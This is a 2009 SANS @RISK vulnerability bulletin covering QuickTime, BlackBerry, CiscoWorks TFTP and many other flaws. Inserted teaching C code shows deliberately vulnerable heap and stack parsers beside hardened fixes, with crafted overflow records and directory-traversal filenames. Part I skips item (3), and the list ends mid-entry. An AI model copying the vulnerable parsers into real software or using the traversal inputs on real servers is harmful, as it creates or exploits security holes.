@RISK: The Consensus Security Vulnerability Alert

Volume: VIII, Issue: 22
May 28, 2009

Apple QuickTime and Blackberry users have critical problems to deal with.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Platform                                  Number of Updates and Vulnerabilities
    - ------------------------------------    -------------------------------------
    Third Party Windows Apps                   4
    Linux                                      1
    Solaris                                    2
    Aix                                        1
    Novell                                     3 (#3)
    Cross Platform                            13 (#1, #2, #4, #5)
    Web Application - Cross Site Scripting    11
    Web Application - SQL Injection           16
    Web Application                           26
    Network Device                             1

******************** Sponsored By Sourcefire, Inc. **********************

Your Network Security Isn't Good Enough Anymore

Today's threats, and today's networks, are dynamic. Unfortunately most network security systems are not.

Join Martin Roesch, Founder and CTO of Sourcefire(r) and Creator of Snort(r), in a series of seminars, as he shows why network security must include full network visibility, relevant context, and automated impact assessment to be effective.

More information http://www.sans.org/info/44123

*************************************************************************

TRAINING UPDATE
- - SANSFIRE in Baltimore 6/13-6/20 (24 long courses, 12 short courses) http://www.sans.org/sansfire09/event.php
- - Pen Testing and Web Application Attack Summit - June 1-2 http://www.sans.org/pentesting09_summit
- - Rocky Mountain SANS, July 7-13 (6 full-length hands-on courses) http://www.sans.org/rockymnt2009/event.php
- - SANS Boston, Aug 2-9 (6 full-length hands-on courses) https://www.sans.org/boston09/index.php
- - National Forensics Summit, July 6-14 http://www.sans.org/forensics09_summit/
Looking for training in your own community? http://sans.org/community/
Save 25% on all On-Demand training (30 full courses) - See samples at http://www.sans.org/ondemand/spring09.php
Plus Amsterdam, London, Dubai, Riyadh, Cairo, Melbourne, Canberra, and Singapore all in the next 90 days.
For a list of all upcoming events, on-line and live: www.sans.org

*************************************************************************

Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Third Party Windows Apps
Linux
Solaris
Aix
Novell
Cross Platform
Web Application - Cross Site Scripting
Web Application - SQL Injection
Web Application
Network Device
PART I Critical Vulnerabilities

Part I for this issue has been compiled by Rohan Kotian at TippingPoint, a division of 3Com, as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (1) CRITICAL: Apple QuickTime PICT Heap Overflow Vulnerability
  • Affected:
    • Apple QuickTime version 7.6 and prior
  • Description: Apple QuickTime, a widely used media player, contains a heap-based buffer overflow in its parsing of malformed .PICT images. The error occurs while parsing a PICT image that contains a poly tag (opcode 0x77): when allocating storage for the tag data, the application does not handle the tag's 16-bit length correctly, which leads to a heap-based buffer overflow. Successful exploitation may lead to arbitrary code execution in the context of the logged-in user. User interaction is required: the victim must visit a malicious site or open a malicious file.

  • Status: Vendor confirmed, updates available.

  • References:
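The mechanism described for item (1), a tag length that is read as 16 bits but not used consistently when the tag data is allocated, is the classic length-width mismatch behind many heap overflows in image parsers. The C program below is an added illustration of that bug class and is not Apple's code: the record layout (one opcode byte, a big-endian 16-bit length, then the data) and the specific mistake (narrowing the length to 8 bits for the allocation) are assumptions chosen to make the class concrete, with only the 0x77 poly opcode taken from the advisory. The sample records are constructed inline.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed record layout for the illustration (not Apple's real PICT parser):
 *   byte 0      opcode (0x77 = poly tag named in the advisory)
 *   bytes 1-2   big-endian 16-bit length of the tag data
 *   bytes 3..   tag data
 */
#define POLY_TAG 0x77

typedef struct { uint8_t tag; size_t len; uint8_t *data; } tagrec;

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* VULNERABLE (illustrative). The 16-bit length is narrowed to 8 bits for the
 * allocation but used in full for the copy, so any length >= 0x100 makes the
 * heap buffer too small and memcpy() writes past it. For reading only: do not
 * call this on untrusted input. */
tagrec *parse_tag_vulnerable(const uint8_t *buf, size_t n) {
    if (n < 3) return NULL;
    uint8_t  alloc_len = (uint8_t)be16(buf + 1);   /* BUG: high byte dropped */
    uint16_t copy_len  = be16(buf + 1);
    tagrec *r = malloc(sizeof *r);
    if (!r) return NULL;
    r->tag  = buf[0];
    r->len  = copy_len;
    r->data = malloc(alloc_len ? alloc_len : 1);
    if (!r->data) { free(r); return NULL; }
    memcpy(r->data, buf + 3, copy_len);             /* heap overflow when copy_len > alloc_len */
    return r;
}

/* Bytes the vulnerable parser would write past its allocation for this record
 * (0 when the record is harmless). Computed without performing the copy. */
size_t vulnerable_overflow_bytes(const uint8_t *buf, size_t n) {
    if (n < 3) return 0;
    size_t copy_len  = be16(buf + 1);
    uint8_t narrowed = (uint8_t)copy_len;
    size_t alloc     = narrowed ? narrowed : 1;
    return copy_len > alloc ? copy_len - alloc : 0;
}

/* HARDENED. One width for the length everywhere, and the declared length is
 * checked against the bytes actually present before anything is allocated. */
tagrec *parse_tag_hardened(const uint8_t *buf, size_t n) {
    if (n < 3) return NULL;
    size_t len = be16(buf + 1);
    if (len > n - 3) return NULL;                   /* declared length exceeds input: reject */
    tagrec *r = calloc(1, sizeof *r);
    if (!r) return NULL;
    r->data = malloc(len ? len : 1);
    if (!r->data) { free(r); return NULL; }
    r->tag = buf[0];
    r->len = len;
    memcpy(r->data, buf + 3, len);
    return r;
}

void tagrec_free(tagrec *r) { if (r) { free(r->data); free(r); } }

/* Payload length the hardened parser accepts for this record, or -1 if it rejects it. */
int hardened_payload_len(const uint8_t *buf, size_t n) {
    tagrec *r = parse_tag_hardened(buf, n);
    if (!r) return -1;
    int len = (int)r->len;
    tagrec_free(r);
    return len;
}

/* Constructed samples. evil_rec declares 0x0105 (261) bytes but carries 4;
 * the vulnerable parser would allocate 5 bytes and copy 261. */
const uint8_t evil_rec[] = { POLY_TAG, 0x01, 0x05, 'A', 'A', 'A', 'A' };
const uint8_t good_rec[] = { POLY_TAG, 0x00, 0x04, 'A', 'A', 'A', 'A' };

int main(void) {
    printf("evil record: vulnerable parser overflows by %zu bytes, hardened parser returns %d\n",
           vulnerable_overflow_bytes(evil_rec, sizeof evil_rec),
           hardened_payload_len(evil_rec, sizeof evil_rec));
    printf("good record: hardened parser accepts %d payload bytes\n",
           hardened_payload_len(good_rec, sizeof good_rec));
    return 0;
}
```

The hardened parser makes two changes, and both matter: the length keeps one width from read to copy, and it is compared against the bytes remaining in the input before any allocation, so a record that lies about its size is rejected rather than trusted.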
  • (2) CRITICAL: BlackBerry Attachment Service PDF distiller Multiple Vulnerabilities
  • Affected:
    • BlackBerry Enterprise Server software version 4.1 Service Pack 3 (4.1.3) through 5.0
    • BlackBerry Professional Software 4.1 Service Pack 4 (4.1.4)
  • Description: The Research In Motion BlackBerry is a popular mobile telephone and messaging device. BlackBerry handhelds are integrated with an enterprise's messaging infrastructure through BlackBerry Enterprise Server. This server software and BlackBerry Professional Software have unspecified vulnerabilities in the BlackBerry Attachment Service, the service used to render attachments in different file formats for viewing on the handheld. The errors are within the PDF distiller component of the Attachment Service. A specially crafted PDF file opened on a BlackBerry device can trigger the vulnerability and cause memory corruption in the Attachment Service. Successful exploitation can lead to arbitrary code execution in the context of that service. Note that a user must first open the PDF on a BlackBerry mobile device for exploitation to occur. No technical details are publicly available.

  • Status: Vendor confirmed, updates available.

  • References:
  • (4) LOW: ImageMagick Integer Overflow Vulnerability
  • Affected:
    • ImageMagick 6.5.2-8
  • Description: ImageMagick is an open-source software suite of graphics manipulation utilities for several operating systems. It has an integer overflow vulnerability while processing a specially crafted, malformed TIFF file. The specific vulnerability is an integer overflow in the "XMakeImage()" function in xwindow.c. By tricking a user into opening a malicious TIFF file, an attacker might crash the affected application or execute arbitrary code. Technical details for this vulnerability are available via source code analysis.

  • Status: Vendor confirmed, updates available.

  • References:
  • (5) LOW: CiscoWorks Common Services TFTP Directory Traversal Vulnerability
  • Affected:
    • Cisco TelePresence Readiness Assessment Manager (CTRAM) 1.0
    • Cisco CiscoWorks Voice Manager 3.x
    • Cisco CiscoWorks QoS Policy Manager 4.x
    • Cisco CiscoWorks LMS 3.0
    • Cisco CiscoWorks Health and Utilization Monitor 1.x
    • Cisco CiscoWorks Common Services 3.1.1
    • Cisco CiscoWorks Common Services 3.0.x
    • Cisco CiscoWorks Common Services 2.2
    • Cisco CiscoWorks Common Services 3.x
    • Cisco Unified Service Monitor 2.x
    • Cisco Unified Service Monitor 1.x
    • Cisco Unified Provisioning Manager 1.x
    • Cisco Unified Operations Manager (CUOM) 2.0.x
    • Cisco Unified Operations Manager (CUOM) 2.x
    • Cisco Unified Operations Manager (CUOM) 1.x
    • Cisco Security Manager (CSM) 3.2.2
    • Cisco Security Manager (CSM) 3.1.1
    • Cisco Security Manager (CSM) 3.0.x
    • Cisco Security Manager (CSM) 3.x
    • CiscoSecure ACS for Windows and Unix 3.0
    • CiscoSecure ACS for Windows and Unix 2.6
    • CiscoSecure ACS for Windows and Unix 2.5
  • Description: CiscoWorks Common Services (CS) is a set of management services used by other CiscoWorks applications to share a common model for data storage, user access privileges, etc. It has a directory traversal vulnerability within its TFTP service, which is enabled by default. A remote attacker could use it to read or modify files belonging to the application and to the host operating system. Authentication is not required to carry out this attack.

  • Status: Vendor has confirmed, updates available.

  • References:
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 22, 2009

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 7041 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 09.22.1 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Nullsoft Winamp "gen_ff.dll" Buffer Overflow
  • Description: Nullsoft Winamp is a media player for Microsoft Windows. The application is exposed to a buffer overflow issue because it fails to perform adequate checks on user-supplied input. Specifically, the issue stems from a type-casting error when parsing a specially crafted ".maki" file in the "gen_ff.dll" library. Winamp versions 5.55 and earlier are affected.
  • Ref: http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html

  • 09.22.2 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Soulseek Distributed File Search Buffer Overflow
  • Description: Soulseek is a file-sharing application available for Microsoft Windows. The application is exposed to a stack-based buffer overflow issue that occurs because it fails to perform adequate boundary checks on user-supplied data. Specifically, this issue occurs when performing a distributed search. Soulseek versions 156 and 157 NS are affected.
  • Ref: http://www.securityfocus.com/bid/35091

  • 09.22.3 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: SonicWALL Global VPN Client "RampartSvc" Local Privilege Escalation
  • Description: SonicWALL Global VPN Client is a VPN solution available for Microsoft Windows. Global VPN Client is prone to a local privilege escalation issue. Specifically, the "RampartSvc" service is run from the "%ProgramFiles%\SonicWALL\SonicWALL Global VPN Client" folder, whose permissions grant access to all local users. Global VPN Client version 4.0.0.835 is affected.
  • Ref: https://www.sec-consult.com/files/20090525-3-GVC-privilege-escalation.txt

  • 09.22.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: SonicWALL Global Security Client Local Privilege Escalation
  • Description: SonicWALL Global Security Client is a security application available for Microsoft Windows. The application is exposed to a local privilege escalation issue because it fails to properly drop privileges when performing sensitive actions. Specifically, the system-tray applet runs with SYSTEM-level privileges. Global Security Client version 1.0.0.15 is affected.
  • Ref: https://www.sec-consult.com/files/20090525-2-GSC-privilege-escalation.txt

  • 09.22.5 - CVE: CVE-2009-0588
  • Platform: Linux
  • Title: Red Hat Certificate System Agent Group Security Bypass
  • Description: Red Hat Certificate System (RHCS) is an enterprise-level Public Key Infrastructure (PKI) deployment manager. RHCS is exposed to a security bypass issue that occurs when systems are configured to use multiple agent groups. Specifically, this issue allows an agent group to approve or reject certificate requests in queues associated with arbitrary agent groups. RHCS version 7.3 is affected.
  • Ref: https://rhn.redhat.com/errata/RHSA-2009-1065.html

  • 09.22.6 - CVE: Not Available
  • Platform: Solaris
  • Title: Sun Solaris Secure Digital Slot Driver (sdhost(7D)) Local Code Execution
  • Description: Sun Solaris Secure Digital Slot Driver (sdhost(7D)) is prone to a local code execution vulnerability. Specifically, an attacker with access to the memory card device may corrupt portions of kernel memory or contents of a memory card. Attackers may be able to exploit this issue to execute arbitrary code in the context of the kernel. Successful exploits may completely compromise the vulnerable system. OpenSolaris based on builds snv_105 through snv_108 on x86 platforms is affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-259408-1

  • 09.22.7 - CVE: CVE-2008-3869, CVE-2008-3870
  • Platform: Solaris
  • Title: Sun Solaris "sadmind" Daemon Multiple Buffer Overflow Vulnerabilities
  • Description: Sun Solaris is exposed to multiple buffer overflow issues that affect the "sadmind(1M)" daemon. Attackers can leverage these issues to execute arbitrary code with superuser privileges. Failed attacks will cause denial of service conditions. Sun Solaris versions 8 and 9 are affected.
  • Ref: http://sunsolve.sun.com/search/document.do?assetkey=1-66-259468-1

  • 09.22.8 - CVE: Not Available
  • Platform: Aix
  • Title: IBM AIX "MALLOCDEBUG" File Overwrite
  • Description: IBM AIX is a UNIX-based operating system. It is exposed to a race condition in the MALLOCDEBUG component of the "libc.a" library. A local attacker can exploit this issue while running a setuid application to overwrite any file on the system.
  • Ref: http://www.securityfocus.com/archive/1/503679

  • 09.22.9 - CVE: Not Available
  • Platform: Novell
  • Title: Novell GroupWise Internet Agent Email Address Processing Buffer Overflow
  • Description: Novell GroupWise is collaboration software available for a number of platforms, including Linux and Microsoft Windows. GroupWise includes an Internet Agent process for mail transfer. The Internet Agent is exposed to a remote buffer overflow issue. Specifically, this issue stems from a boundary condition error that occurs when handling email addresses via SMTP.
  • Ref: http://www.novell.com/support/viewContent.do?externalId=7003273&sliceId=1

  • 09.22.10 - CVE: Not Available
  • Platform: Novell
  • Title: Novell GroupWise Internet Agent SMTP Request Processing Buffer Overflow
  • Description: Novell GroupWise is collaboration software available for a number of platforms, including Linux and Microsoft Windows. GroupWise includes an Internet Agent process for mail transfer. The Internet Agent is exposed to a remote buffer overflow issue. Specifically, this issue stems from a boundary condition error that occurs when handling certain SMTP requests.
  • Ref: http://www.novell.com/support/viewContent.do?externalId=7003272&sliceId=1

  • 09.22.11 - CVE: CVE-2009-1634, CVE-2009-1635
  • Platform: Novell
  • Title: Novell GroupWise WebAccess Multiple Security Vulnerabilities
  • Description: Novell GroupWise WebAccess is a secure mobile option for GroupWise collaboration software. The application is exposed to multiple issues. Novell GroupWise WebAccess versions prior to 7.03 HP3 and 8.0.0 HP2 are affected.
  • Ref: http://www.novell.com/support/viewContent.do?externalId=7003266&sliceId=1

  • 09.22.12 - CVE: CVE-2009-1161
  • Platform: Cross Platform
  • Title: CiscoWorks Common Services TFTP Server Directory Traversal
  • Description: CiscoWorks Common Services is a component of the CiscoWorks network management product. The Trivial File Transfer Protocol (TFTP) server included with CiscoWorks Common Services is exposed to a directory traversal issue because it fails to sufficiently sanitize user-supplied input in TFTP requests. CiscoWorks Common Services versions 3.0.x, 3.1.x and 3.2.x running on Microsoft Windows are affected.
  • Ref: http://www.securityfocus.com/archive/1/503643
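Item (5) in Part I and entry 09.22.12 above both concern the same flaw: a TFTP server that does not sufficiently sanitize the filename in a request, so a client can walk out of the TFTP root. The C program below is an added example, not Cisco's code, showing both halves of that picture: how an RFC 1350 read request is laid out on the wire (the filename is the only attacker-controlled field) and the component-wise path check a server should apply before opening anything. The TFTP root, buffer sizes and the sample filenames are constructed for the illustration; the Windows-specific rejections (backslash, drive prefix) are included because the affected servers run on Windows.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* TFTP read/write request (RFC 1350):
 *   | opcode (2 bytes, big-endian) | filename | 0 | mode | 0 |
 * The filename is the only thing the client controls, and it is what a
 * traversal attack abuses. */
#define TFTP_RRQ 1
#define TFTP_WRQ 2

/* Client side: build an RRQ for `filename`. Returns packet length, or -1 if it does not fit. */
int tftp_build_rrq(uint8_t *out, size_t cap, const char *filename, const char *mode) {
    size_t fl = strlen(filename), ml = strlen(mode);
    size_t need = 2 + fl + 1 + ml + 1;
    if (need > cap) return -1;
    out[0] = 0;
    out[1] = TFTP_RRQ;
    memcpy(out + 2, filename, fl + 1);          /* includes the terminating NUL */
    memcpy(out + 2 + fl + 1, mode, ml + 1);
    return (int)need;
}

/* Server side: parse an RRQ/WRQ and copy the requested name into fname.
 * Returns the opcode, or -1 if the packet is malformed. */
int tftp_parse_request(const uint8_t *pkt, size_t len, char *fname, size_t fcap) {
    if (len < 4) return -1;
    int op = (pkt[0] << 8) | pkt[1];
    if (op != TFTP_RRQ && op != TFTP_WRQ) return -1;
    const uint8_t *end = memchr(pkt + 2, 0, len - 2);
    if (!end) return -1;                        /* filename not NUL-terminated inside the packet */
    size_t fl = (size_t)(end - (pkt + 2));
    if (fl + 1 > fcap) return -1;
    memcpy(fname, pkt + 2, fl);
    fname[fl] = 0;
    size_t rest = len - (size_t)(end + 1 - pkt);
    if (rest == 0 || !memchr(end + 1, 0, rest)) return -1;   /* mode must be terminated too */
    return op;
}

/* Server side: the requested name must be a plain relative path. Reject absolute
 * paths, drive letters, backslashes (the affected servers run on Windows, where
 * '\' is also a separator), control characters, empty components, "." and "..".
 * Rejecting ".." as a whole component is what stops "../../x" from escaping the
 * TFTP root; stripping "../" substrings instead is a common, bypassable mistake. */
int tftp_name_is_safe(const char *name) {
    if (name[0] == 0 || name[0] == '/' || name[0] == '\\') return 0;
    if (name[1] == ':') return 0;                           /* "C:" style prefix */
    const char *p = name;
    while (*p) {
        const char *q = p;
        while (*q && *q != '/') {
            if (*q == '\\' || (unsigned char)*q < 0x20) return 0;
            q++;
        }
        size_t cl = (size_t)(q - p);
        if (cl == 0) return 0;                              /* "a//b" or trailing "/" */
        if (cl == 1 && p[0] == '.') return 0;
        if (cl == 2 && p[0] == '.' && p[1] == '.') return 0;
        p = *q ? q + 1 : q;
    }
    return 1;
}

/* Parse + policy in one call. 1 = serve, 0 = reject (traversal), -1 = malformed packet. */
int tftp_packet_allowed(const uint8_t *pkt, size_t len) {
    char fname[256];
    if (tftp_parse_request(pkt, len, fname, sizeof fname) < 0) return -1;
    return tftp_name_is_safe(fname);
}

/* Round trip: build the RRQ a client would send for `name`, then judge it as the server. */
int tftp_round_trip(const char *name) {
    uint8_t pkt[516];
    int n = tftp_build_rrq(pkt, sizeof pkt, name, "octet");
    if (n < 0) return -1;
    return tftp_packet_allowed(pkt, (size_t)n);
}

/* Constructed sample: a packet whose filename never terminates. */
const uint8_t unterminated_pkt[] = { 0x00, 0x01, 'a', 'b', 'c', 'd' };

int main(void) {
    const char *names[] = { "configs/router.cfg", "../../../secret.txt",
                            "..\\..\\secret.txt", "/etc/hosts", "C:/secret.txt" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-24s -> %d\n", names[i], tftp_round_trip(names[i]));
    printf("unterminated packet      -> %d\n",
           tftp_packet_allowed(unterminated_pkt, sizeof unterminated_pkt));
    return 0;
}
```

Two practical notes. The check is an allow-list on path components rather than a search for "../", because substring stripping can be bypassed (for example "....//" collapsing to "../" after one pass). And the policy is applied to the name as parsed from the packet, before any path is joined to the server root, which is the point at which the vulnerable servers trusted the client.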

  • 09.22.13 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Drupal Email Verification Module Cross-Site Scripting and Information Disclosure Vulnerabilities
  • Description: Drupal Email Verification verifies user emails by talking to the appropriate SMTP host. The application is exposed to multiple cross-site scripting issues that affect the "username" and "email address" parameters; and an information disclosure issue that allows attackers to view the list of unconfirmed email addresses. Email Verification versions 5.x-1.x prior to 5.x-2.1 and 6.x prior to 6.x-1.2 are affected.
  • Ref: http://drupal.org/node/468452

  • 09.22.14 - CVE: CVE-2009-1376, CVE-2009-1375, CVE-2009-1374, CVE-2009-1373
  • Platform: Cross Platform
  • Title: Pidgin Multiple Buffer Overflow Vulnerabilities
  • Description: Pidgin is a multiplatform instant-messaging client that supports multiple messaging protocols. Pidgin is exposed to multiple buffer overflow issues because it fails to perform adequate boundary checks on user-supplied data. Pidgin versions prior to 2.5.6 are affected.
  • Ref: http://www.pidgin.im/news/security/?id=29

  • 09.22.15 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple Panda Products TAR/CAB Files Scan Evasion
  • Description: Panda develops antivirus products. Multiple Panda products are exposed to an issue that may allow certain compressed archives to bypass the scan engine. The vulnerability occurs because the software fails to properly inspect specially crafted "TAR" and "CAB" archive files.
  • Ref: http://www.pandasecurity.com/homeusers/support/card?id=70025&idIdioma=2

  • 09.22.16 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Serena Dimensions CM SSL Certificate Signature Verification
  • Description: Serena Dimensions CM is a software development tool. The Dimensions CM Client is exposed to a signature verification issue. Specifically, the client fails to properly verify certificate signatures when communications are encrypted using SSL, so a certificate carrying an arbitrary signature is accepted by the client. Serena Dimensions CM version 10.1 is affected.
  • Ref: http://www.securityfocus.com/archive/1/503730

  • 09.22.17 - CVE: CVE-2009-1476
  • Platform: Cross Platform
  • Title: IPFilter "ippool" "lib/load_http.c" Local Buffer Overflow
  • Description: IPFilter is a firewall and network address translation (NAT) implementation for BSD, Linux, and Unix operating systems. IPFilter is exposed to a local buffer overflow issue because it fails to adequately bounds check user-supplied input. The issue occurs in the "lib/load_http.c" source file and can be triggered with excessively long input to URIs handled by the "load_http()" function. This function is used by the "ippool" application. IPFilter version 4.1.31 is affected.
  • Ref: http://cvsweb.netbsd.org/bsdweb.cgi/src/dist/ipf/lib/load_http.c?rev=1.2&content-type=text/x-cvsweb-markup&only_with_tag=MAIN
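The IPFilter entry describes the other common shape of a C buffer overflow: a URI of unbounded length copied into a fixed-size buffer. The C program below is an added illustration of that class and is not IPFilter's load_http.c: the buffer size, the "http://host[:port]/path" splitting logic and the sample URLs are assumptions constructed for the example. It shows the unbounded copy next to a bounded version that measures first and rejects oversized input instead of truncating it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define URL_BUF 512   /* assumed buffer size for the illustration; not the real load_http.c value */

typedef struct { char host[URL_BUF]; int port; char path[URL_BUF]; } url_parts;

/* Shared step: split "host[:port]/path" (scheme already removed) held in a writable,
 * NUL-terminated buffer that is known to fit. Returns 0 on success, -1 on bad input. */
static int split_hostport_path(char *work, url_parts *out) {
    char *slash = strchr(work, '/');
    if (slash) {
        *slash = 0;
        snprintf(out->path, sizeof out->path, "/%s", slash + 1);
    } else {
        snprintf(out->path, sizeof out->path, "/");
    }
    char *colon = strchr(work, ':');
    out->port = 80;
    if (colon) {
        *colon = 0;
        out->port = atoi(colon + 1);
        if (out->port <= 0 || out->port > 65535) return -1;
    }
    if (*work == 0) return -1;                  /* empty host */
    snprintf(out->host, sizeof out->host, "%s", work);
    return 0;
}

/* VULNERABLE (illustrative of the bug class, not IPFilter's code): the URL is
 * copied into a fixed stack buffer with strcpy(), so a URL of URL_BUF bytes or
 * more overwrites whatever follows the buffer on the stack. For reading only. */
int parse_url_unbounded(const char *url, url_parts *out) {
    char work[URL_BUF];
    if (strncmp(url, "http://", 7) != 0) return -1;
    strcpy(work, url + 7);                      /* no bound check: stack buffer overflow */
    return split_hostport_path(work, out);
}

/* HARDENED: measure first, reject anything that does not fit, and copy with the
 * exact byte count. Rejecting beats silent truncation, which can quietly turn
 * one host name into a different, shorter one. */
int parse_url_bounded(const char *url, url_parts *out) {
    char work[URL_BUF];
    if (strncmp(url, "http://", 7) != 0) return -1;
    size_t rest = strlen(url + 7);
    if (rest >= sizeof work) return -1;         /* would not fit with its NUL: reject */
    memcpy(work, url + 7, rest + 1);
    return split_hostport_path(work, out);
}

/* Constructed sample input: a URL well beyond the buffer size, the kind of input
 * that crashes the unbounded version. Built at run time rather than spelled out. */
static char g_long_url[URL_BUF + 64];
const char *make_long_url(void) {
    memset(g_long_url, 'A', sizeof g_long_url - 1);
    g_long_url[sizeof g_long_url - 1] = 0;
    memcpy(g_long_url, "http://", 7);
    return g_long_url;
}

url_parts g_parts;   /* scratch output for callers that only look at return codes */

int main(void) {
    if (parse_url_bounded("http://example.com:8080/cgi/list", &g_parts) == 0)
        printf("host=%s port=%d path=%s\n", g_parts.host, g_parts.port, g_parts.path);
    printf("oversized URL: bounded parser returns %d\n",
           parse_url_bounded(make_long_url(), &g_parts));
    return 0;
}
```

The stand-alone main() deliberately never feeds the long URL to parse_url_unbounded(); doing so is the crash the advisory describes, and the interesting part for a reviewer is the single missing length comparison that separates the two functions.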

  • 09.22.18 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Wireshark PCNFSD Dissector Denial of Service
  • Description: Wireshark (formerly Ethereal) is an application for analyzing network traffic; it is available for Microsoft Windows and UNIX-like operating systems. Wireshark is exposed to a denial of service issue that affects the "PCNFSD" dissector. Wireshark versions 0.8.20 through 1.0.7 are affected.
  • Ref: http://www.wireshark.org/security/wnpa-sec-2009-03.html

  • 09.22.19 - CVE: CVE-2009-1754
  • Platform: Cross Platform
  • Title: Open Handset Alliance Android Signature Validation Local Privilege Escalation
  • Description: Open Handset Alliance Android (previously Google Android) is a software stack and operating system for mobile phones. Android allows multiple applications to share a uid (user ID) when they are signed by the same vendor and request to do so when installed. Android is exposed to a privilege escalation issue due to a failure to properly enforce restrictions on this behavior. Android versions 1.5 CRB17 through 1.5 CRB42 are affected.
  • Ref: http://www.ocert.org/advisories/ocert-2009-006.html

  • 09.22.20 - CVE: Not Available
  • Platform: Cross Platform
  • Title: SonicWALL Global VPN Client Log File Remote Format String
  • Description: SonicWALL Global VPN Client provides virtual private networking for mobile users. The application is exposed to a remote format string issue because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted printing function. This issue occurs in an unspecified function that handles logfile parsing. Global VPN Client version 4.0.0.2-51e Standard and Enhanced are affected.
  • Ref: http://www.securityfocus.com/archive/1/503833

  • 09.22.21 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Lighttpd Trailing Slash Information Disclosure
  • Description: Lighttpd is a freely available webserver application. Lighttpd is exposed to an information disclosure issue that occurs when an attacker specifies a file followed by a trailing slash ("/"). The attacker can exploit this issue to obtain sensitive information that may lead to further attacks. Lighttpd version 1.4.23 is affected.
  • Ref: http://redmine.lighttpd.net/issues/1989

  • 09.22.22 - CVE: Not Available
  • Platform: Cross Platform
  • Title: Multiple ArcaBit ArcaVir Products Multiple IOCTL Request Local Privilege Escalation Vulnerabilities
  • Description: ArcaBit ArcaVir products are security products for Microsoft Windows platforms. The applications are exposed to multiple local privilege escalation issues because the "ps_drv.sys" driver fails to properly validate user-space input before writing it to the "\Device\ps_drv" device.
  • Ref: http://ntinternals.org/ntiadv0814/ntiadv0814.html

  • 09.22.23 - CVE: Not Available
  • Platform: Cross Platform
  • Title: BlackBerry Attachment Service PDF Distiller Multiple Unspecified Security Vulnerabilities
  • Description: BlackBerry Attachment Service is a component of BlackBerry Enterprise Server and BlackBerry Professional Software; it is used to process email attachments. BlackBerry Attachment Service is exposed to multiple remote code execution issues that occur when the service's PDF distiller tries to process specially crafted PDF files.
  • Ref: http://www.blackberry.com/btsc/dynamickc.do?externalId=KB18327&sliceID=1&command=show&forward=nonthreadedKC&kcId=KB18327

  • 09.22.24 - CVE: Not Available
  • Platform: Cross Platform
  • Title: ImageMagick TIFF File Integer Overflow
  • Description: ImageMagick is an image-editing suite that includes a library and command-line utilities supporting numerous image formats, including TIFF. It is available for various platforms, including Microsoft Windows, UNIX, and UNIX-like operating systems. ImageMagick is exposed to an integer overflow issue because it fails to perform adequate boundary checks on user-supplied data. The vulnerability occurs when handling malformed TIFF files. ImageMagick version 6.5.2-8 is affected.
  • Ref: http://mirror1.smudge-it.co.uk/imagemagick/www/changelog.html

  • 09.22.25 - CVE: CVE-2009-1635
  • Platform: Web Application - Cross Site Scripting
  • Title: Novell GroupWise WebAccess "gw/webacc" Multiple Cross-Site Scripting Vulnerabilities
  • Description: Novell GroupWise WebAccess is a secure mobile option for GroupWise collaboration software. The application is exposed to multiple cross-site scripting issues because it fails to sufficiently sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/archive/1/503700

  • 09.22.26 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Steam "steam://" Cross-Site Scripting
  • Description: Steam is a gaming application. The application is exposed to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. Specifically, the issue occurs when a malicious request is sent through the "steam://" protocol.
  • Ref: http://www.securityfocus.com/bid/35036

  • 09.22.27 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: IPplan "grp" Parameter Cross-Site Scripting
  • Description: IPplan is an open-source IP address management and planning web application. It is programmed in PHP, and stores its information in an SQL database. The application is exposed to a cross-site scripting issue because it fails to sanitize user-supplied input. Specifically, the issue affects the "grp" parameter in the "admin/usermanager" page. IPplan version 4.91a is affected.
  • Ref: http://holisticinfosec.org/content/view/113/45/

  • 09.22.28 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Kingsoft WebShield Cross-Site scripting and Remote Command Execution
  • Description: Kingsoft WebShield is an application that protects a user's browser against malware. The application is exposed to a remote cross-site scripting and command execution issue because it fails to properly filter HTML tags from URIs. WebShield versions 1.1.0.62 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/35038

  • 09.22.29 - CVE: Not Available
  • Platform: Web Application - Cross Site Scripting
  • Title: Catviz Multiple Local File Include and Cross-Site Scripting Vulnerabilities
